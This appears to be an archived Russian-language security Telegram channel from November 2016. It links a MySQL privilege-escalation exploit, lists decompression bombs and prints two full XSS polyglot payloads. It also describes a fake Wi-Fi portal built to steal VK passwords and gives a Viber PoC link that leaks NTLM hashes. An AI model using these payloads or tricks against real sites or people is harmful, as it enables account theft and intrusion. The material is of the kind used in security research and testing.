Size: a a a

2016 November 02
Кавычка
В сети появился эксплойт под MySQL / MariaDB / PerconaDB - поднятие привелегий до root'а (опять race condition, ога).
http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
https://www.exploit-db.com/exploits/40679/
источник
Кавычка
А как насчёт бомб?  Приготовил небольшой сборник:

42.zip - классическая zip-бомба, занимающая в сжатом виде 42 килобайта, при постоянной распаковке, пока набор данных не достигнет верхнего предела распаковки в 4.3 гигабайта, будет занимать в памяти более 4.5 петабайт

r.zip - другой вариант zip-бомбы, с 1 директорией и архивом внутри

r.gz и r.tar.gz - аналогичные gzip-бомбы

droste.zip - zip архив который содержит изображение (чуть меньше 14 кб) и сам себя

spark.png.bz2 (420 байт) и распакованный spark.png - разжимается в изображение 225000х225000 пикcелей, который займет 141,4 ГБ в памяти
источник
Кавычка
источник
2016 November 03
Кавычка
Универсаньные xss-вектора

Вектор с thespanner уже стал классическим, несколько лет назад о нем писал Raz0r. Отрабатывает в атрибутах, закрывает теги, покрывает bb-code, разворачивает изображение на весь экран с алертом

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"



Менее короткий, но не менее интересный xss-полиглот, работает за счет множества комментов и имеет вложенные закрывающие теги (понравился подход), которые закрываются еденичным --!>
Не покрывает только double encoding и html entities, но всё в твоих руках :)

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
источник
2016 November 09
Кавычка
Помните, tlgm.ru был в XSS'ках от моего канала?

Вот новый парсер каналов подтянулся
https://tgram.ru/channels/bo0om_ru
источник
Кавычка
источник
2016 November 11
Кавычка
RCE с помощью DNS запроса - изи катка.
Жаль, что самое интересное скрыли, через месяц появится в паблике полная версия, так что оставлю это здесь.
источник
Кавычка
Опасный резолв. Разбираем на пальцах три мощных вектора атак через DNS
https://goo.gl/hDHNV3
источник
Кавычка
Когда-то делал вот такую штуку на базе mr-3040, забавы ради. Под видом бесплатного вайфая (с mana) раздаётся точка доступа. Интернета, там, естественно нет, но мы об этом не говорим, а в качестве регистрации (или при попытке открыть любой сайт) нужно ввести логин и пароль к VK (который в любом случае скажет, что пароль неверный). Встроенного аккумулятора хватает на часов 5, размер меньше телефона, такая вот мобильная штука - ловушка для любителей халявы.
источник
Кавычка
источник
Кавычка
источник
2016 November 16
Кавычка
источник
2016 November 18
Кавычка
Сегодня в рамках ZeroNights расскажу доклад об способах и общих подходах к обходу современных защит веб-приложений и прочих мониторящих штук, которые становятся в разрезе между клиентом и сервером и мониторят HTTP трафик. Если кто там, велком :)
источник
Кавычка
источник
Кавычка
Мои слайды с Zeronights 2016 | Удар ниже пояса. Обход современных WAF/IPS/DLP
http://www.slideshare.net/ssusera0a306/zeronights-2016-a-blow-under-the-belt-how-to-avoid-wafipsdlp-wafipsdlp
источник
Кавычка
Никто и не заметил, а ребята из Казахстана на ZeroNights рассказали о классной фиче в Viber.
Когда в Viber кидаешь ссылку, он сначала идет туда HEAD запросом, но только по внешним адресам, проверяет, есть ли контент, если ему ответить - да, есть картинка, он идет за ней. А вот идет он с помощью бажного модуля, которым, например, внутренний ресурс поломать можно (SSRF). Но это еще цветочки.
Когда отвечаешь ему - "Здарова вайбер, а дай-ка мне логин и пароль от винды (NTLM Auth) " - он даёт)).

Вот вам PoC:
Отправив ссылку собеседнику в Viber под Windows, он увидит изображение со своим логином/доменом.
https://bo0om.ru/viber.php
источник
Кавычка
А лог отстуков вайбера (с хэшем, где в т.ч. пароль) можно посмотреть так https://bo0om.ru/viber.php?HelloViber
источник
Кавычка
А еще ребятки нашли как делать десериализацию в java передав серализованный объект с специальным content-type
источник
Кавычка
В общем много идей и мыслей, много записей докладов нужно посмотреть (жаль очень мало веба), zeronights удался.
источник
2016 November 22
Кавычка
С ноября по декабрь на форуме АНТИЧАТ будет проходить уникальное мероприятие:
Новогодний видеоконкурс 2017.
Тематика конкурса - практическая информационная безопасность.

Любой желающий может побороться за призовое место.
Чтобы принять участие в конкурсе, требуется снять видео в разрешении не ниже 720, вставить строчку "Видео сделано специально для новогоднего конкурса Античата 2017", а затем отправить его на e-mail psihoz26@antichat.net.

Заявки будут приниматься с 1 ноября по 15 декабря.
Жюри выберут топ 3 самых хардкорных видео по следующим критериям: уникальность техники, сложность эксплуатации, креативность.

Главный призовой фонд - 100 т.р., будет разбит так:
Первое место: 60000р
Второе место: 30000р
Третье место: 10000р

Подробности на форуме АНТИЧАТ: https://forum.antichat.ru/threads/443093/

//А я там один из членов жюри
источник